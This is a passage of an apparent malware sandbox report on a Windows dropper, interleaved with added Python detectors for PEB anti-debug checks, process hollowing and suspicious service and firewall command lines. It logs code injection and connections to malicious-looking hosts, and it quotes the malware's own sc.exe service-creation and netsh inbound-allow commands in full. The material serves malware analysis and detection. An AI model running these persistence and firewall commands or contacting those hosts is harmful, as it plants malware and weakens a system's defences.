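    """Return (line_index, peb_field, verdict) for each dereference through a
    register that was loaded from fs:[30h] within the previous `window` lines."""
    live: Dict[str, int] = {}          # register -> line where it received the PEB pointer
    hits: List[Tuple[int, str, str]] = []
    for i, line in enumerate(disasm):
        m = PEB_LOAD.search(line)
        if m:
            live[m.group("reg").lower()] = i
            continue
        for reg in [r for r, at in live.items() if i - at > window]:
            del live[reg]                                   # too far away to be the same check
        for d in DEREF.finditer(line):
            reg = d.group("reg").lower()
            if reg in live:
                off = parse_offset(d.group("off"))
                field, verdict = PEB_FIELDS.get(off, (f"PEB+{off:#x}", "unknown"))
                hits.append((i, field, verdict))
        w = WRITES_REG.search(line)
        if w and w.group("reg").lower() in live:
            del live[w.group("reg").lower()]                # register overwritten
    return hits

PRIORITY = ["anti-debug", "heap-flags", "module-walk", "unknown"]

def summarize(disasm: List[str]) -> str:
    """Strongest verdict in the snippet, or "none" when fs:[30h] is never consumed."""
    verdicts = {v for _, _, v in classify_peb_reads(disasm)}
    return next((p for p in PRIORITY if p in verdicts), "none")

# Constructed snippet: two anti-debug checks, one Ldr walk, one heap-flags chain.
SAMPLE_DISASM = [
    "0040c180  mov eax, dword ptr fs:[00000030h]",
    "0040c186  movzx ecx, byte ptr [eax+2]",          # PEB.BeingDebugged
    "0040c18a  test ecx, ecx",
    "0040c18c  jne 0040c1f0",
    "0040c18e  mov eax, dword ptr fs:[00000030h]",
    "0040c194  mov eax, dword ptr [eax+68h]",          # PEB.NtGlobalFlag
    "0040c197  and eax, 70h",
    "0040c19a  jne 0040c1f0",
    "0068092b  mov eax, dword ptr fs:[00000030h]",
    "00680931  mov eax, dword ptr [eax+0Ch]",          # PEB.Ldr: API resolution, not anti-debug
    "00680934  mov esi, dword ptr [eax+14h]",          # Ldr.InMemoryOrderModuleList
    "00401a00  mov ecx, dword ptr fs:[00000030h]",
    "00401a06  mov ecx, dword ptr [ecx+18h]",          # PEB.ProcessHeap
    "00401a09  mov ecx, dword ptr [ecx+40h]",          # HEAP.Flags (32-bit, Vista and later)
    "00401a0c  cmp ecx, 2",
]

if __name__ == "__main__":
    for idx, field, verdict in classify_peb_reads(SAMPLE_DISASM):
        print(f"{SAMPLE_DISASM[idx]:<48} {field:<14} {verdict}")
    print("overall:", summarize(SAMPLE_DISASM))
```

The report's separate "Process queried: DebugPort" entries are the other half of the same picture: that is NtQueryInformationProcess with ProcessDebugPort, which this static heuristic does not see, so a sample can clear this check and still be debugger-aware.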

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.53.36 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exeFile created: A332.exe.5.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E70000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeMemory written: C:\Users\user\Desktop\ECD2MpEBSf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaMemory written: C:\Users\user\AppData\Roaming\jgdhbua base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeMemory written: C:\Users\user\AppData\Local\Temp\3D34.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeThread created: C:\Windows\explorer.exe EIP: 44C1930
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaThread created: unknown EIP: 4F11930
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DC5008
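The call list the report shows for ECD2MpEBSf.exe at 0_2_00570110 is the textbook process-hollowing chain: create a child suspended, read its thread context, unmap the original image, allocate and write a new one (the "value starts with: 4D5A" entries above are the MZ header landing in the target), point the thread at the new entry, resume. Seen in an API trace, the individual calls are all legitimate; it is the ordered sequence that matters. The matcher below is an added example, not part of the sandbox report or of any vendor product. Each step accepts either the Win32 wrapper or the native Nt/Zw call, the unmap step is optional because a loader only needs it when the target's image base is already occupied, and a gap limit stops a long benign trace that merely contains all seven APIs from matching. The traces it runs on are constructed, except the first, which is parsed from the report line itself.

```python
"""Ordered-subsequence matcher for the process-hollowing API chain.

Added example, not part of the sandbox report. Traces below are constructed
(the first is parsed from the report's own 0_2_00570110 entry).
"""
from typing import List, Optional, Sequence, Tuple

Step = Tuple[frozenset, bool]   # (interchangeable API names, required?)
HOLLOWING_CHAIN: List[Step] = [
    (frozenset({"CreateProcessA", "CreateProcessW", "NtCreateUserProcess"}), True),
    (frozenset({"GetThreadContext", "NtGetContextThread"}), True),
    (frozenset({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}), False),   # optional
    (frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory"}), True),
    (frozenset({"WriteProcessMemory", "NtWriteVirtualMemory"}), True),
    (frozenset({"SetThreadContext", "NtSetContextThread"}), True),
    (frozenset({"ResumeThread", "NtResumeThread"}), True),
]

def parse_report_calls(code_function_line: str) -> List[str]:
    """'0_2_00570110 VirtualAlloc,CreateProcessA,...,' -> ['VirtualAlloc', 'CreateProcessA', ...]"""
    _, _, calls = code_function_line.strip().partition(" ")
    return [c for c in calls.split(",") if c]

def match_chain(calls: Sequence[str], chain: Sequence[Step] = HOLLOWING_CHAIN,
                max_gap: int = 64) -> Optional[List[int]]:
    """Return the trace indices of the matched steps, or None.

    Steps must occur in order. At most `max_gap` unrelated calls may separate
    two consecutive steps; a partial match older than that is discarded so a
    long benign trace that happens to contain every API somewhere is not flagged.
    """
    step, last, idx = 0, -1, []
    for i, name in enumerate(calls):
        if last >= 0 and i - last > max_gap:
            step, last, idx = 0, -1, []               # partial chain went stale; start over
        while (not chain[step][1] and name not in chain[step][0]
               and step + 1 < len(chain) and name in chain[step + 1][0]):
            step += 1                                  # optional step absent from this trace
        if name in chain[step][0]:
            idx.append(i)
            last = i
            step += 1
            if step == len(chain):
                return idx
    return None

def is_hollowing(calls: Sequence[str]) -> bool:
    return match_chain(calls) is not None

# The report's own entry for ECD2MpEBSf.exe (leading "Code function:" label removed).
REPORT_LINE = ("0_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,"
               "GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,"
               "NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,"
               "ResumeThread,ExitProcess,")
# Constructed traces for contrast.
NO_UNMAP = ["CreateProcessW", "GetThreadContext", "VirtualAllocEx",
            "WriteProcessMemory", "SetThreadContext", "ResumeThread"]          # variant without unmap
DEBUGGER_LIKE = ["CreateProcessW", "GetThreadContext", "SetThreadContext",
                 "ResumeThread", "WaitForSingleObject"]                        # no alloc/write: benign
GAPPY = ["CreateProcessA"] + ["Sleep"] * 70 + NO_UNMAP[1:]                     # steps too far apart

if __name__ == "__main__":
    calls = parse_report_calls(REPORT_LINE)
    print("report trace:", match_chain(calls))
    print("no-unmap variant:", match_chain(NO_UNMAP))
    print("debugger-like:", match_chain(DEBUGGER_LIKE))
    print("gappy (default gap):", match_chain(GAPPY), "(gap=100):", match_chain(GAPPY, max_gap=100))
```

The same matcher applies to the runtime evidence above for krmdinzg.exe against svchost.exe (allocate at E70000 with execute/read/write, write an MZ image there, create a thread) if the sandbox's per-process API trace is fed in instead of the static call list; only the chain definition changes.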
                      .NET source code references suspicious native API functions
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 3D34.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.2.3D34.exe.ec0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 18.0.3D34.exe.ec0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.3D34.exe.ec0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.2.3D34.exe.150000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 37.0.3D34.exe.150000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000005.00000000.707515512.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.690989034.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.679013555.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000005.00000000.698669276.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.707726706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691158816.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.679155030.0000000001080000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766024254.0000000000C70000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.766809458.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000005.00000000.684563899.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700236114.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3D34.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00419D72 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Modifies the windows firewall
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
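Read together with the process tree above, the netsh command is the last step of a small persistence routine: cmd.exe creates a randomly named folder under SysWOW64 and moves the payload there, sc.exe registers it as an auto-start service whose argument points back at the dropper in Temp, and netsh adds an inbound allow rule for the 32-bit svchost.exe that the service will later inject into. Each command is ordinary administration on its own; the tells are in the argument values. The script below is an added triage example, not part of the sandbox report or of any vendor rule set: it parses sc.exe, netsh.exe and cmd.exe command lines of this shape and reports why each is suspicious. The allowlists and thresholds are assumptions chosen for the illustration; the sample command lines are the ones shown in this report plus one benign rule constructed for contrast.

```python
"""Command-line triage for service creation, firewall rules and system-directory writes.

Added example, not part of the sandbox report. Allowlists are assumptions.
"""
import ntpath
import re
from typing import Dict, List, Sequence

# key= value (sc.exe puts a space after '=') or key=value (netsh). A quoted value
# may contain \" escapes, and the closing quote is optional because the captured
# command lines in the report are unbalanced.
KV = re.compile(r'(\w+)=\s*(?:"((?:\\.|[^"\\])*)(?:"|$)|(\S+))')
# a path under System32 / SysWOW64 (used to find the destination of move/mkdir)
SYSTEM_DIR_PATH = re.compile(r'c:\\windows\\(?:syswow64|system32)\\[^\s"]*')

# Assumption: a firewall allow rule for these is never created by a normal installer.
SYSTEM_HOST_BINARIES = {"svchost.exe", "explorer.exe", "lsass.exe",
                        "winlogon.exe", "services.exe", "csrss.exe"}
# Assumption: where legitimate service binaries live (tune per estate).
STANDARD_SERVICE_DIRS = (r"c:\windows\system32", r"c:\program files", r"c:\program files (x86)")

def parse_kv(cmdline: str) -> Dict[str, str]:
    out: Dict[str, str] = {}
    for m in KV.finditer(cmdline):
        val = m.group(2) if m.group(2) is not None else m.group(3)
        out[m.group(1).lower()] = val.strip()
    return out

def _image_dir(binpath: str) -> str:
    """Directory of the first .exe in an sc.exe binPath value, lower-cased."""
    m = re.match(r'\s*"?(.+?\.exe)', binpath, re.I)
    return ntpath.dirname(m.group(1)).lower() if m else ""

def assess(cmdline: str) -> List[str]:
    low = cmdline.lower()
    kv = parse_kv(cmdline)
    findings: List[str] = []

    if "sc.exe" in low and " create " in low:
        binpath = kv.get("binpath", "")
        d = _image_dir(binpath)
        if not (d == STANDARD_SERVICE_DIRS[0] or d.startswith(STANDARD_SERVICE_DIRS[1:])):
            findings.append(f"service binary outside standard locations: {d}")
        if "\\appdata\\local\\temp\\" in binpath.lower():
            findings.append("service command line references a Temp dropper path")
        if kv.get("start", "").lower() == "auto":
            findings.append("auto-start service")

    if "netsh" in low and "advfirewall" in low and "add rule" in low:
        prog = kv.get("program", "")
        base = ntpath.basename(prog).lower()
        if kv.get("action", "").lower() == "allow" and base in SYSTEM_HOST_BINARIES:
            findings.append(f"inbound allow rule for system host binary {base}")
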